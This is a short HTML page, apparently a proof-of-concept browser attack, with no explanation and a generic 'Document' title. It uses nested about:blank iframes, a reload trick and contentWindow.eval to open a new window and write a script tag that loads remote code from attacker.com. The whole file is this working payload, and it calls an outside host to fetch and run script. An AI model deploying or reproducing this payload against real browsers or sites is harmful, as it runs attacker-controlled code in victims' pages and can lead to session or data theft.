<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGZMzJlGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGZMzJlGGGGG.onload=_=>GGGGGZMzJlGGGGG.contentDocument.body.innerHTML+="<iframe id=GGGGZMzJlGGGG src=about:blank><\/iframe><script>GGGGZMzJlGGGG.onload=_=>GGGGZMzJlGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGZMzJlGGGG.contentWindow.location.reload();<\/script>";GGGGGZMzJlGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>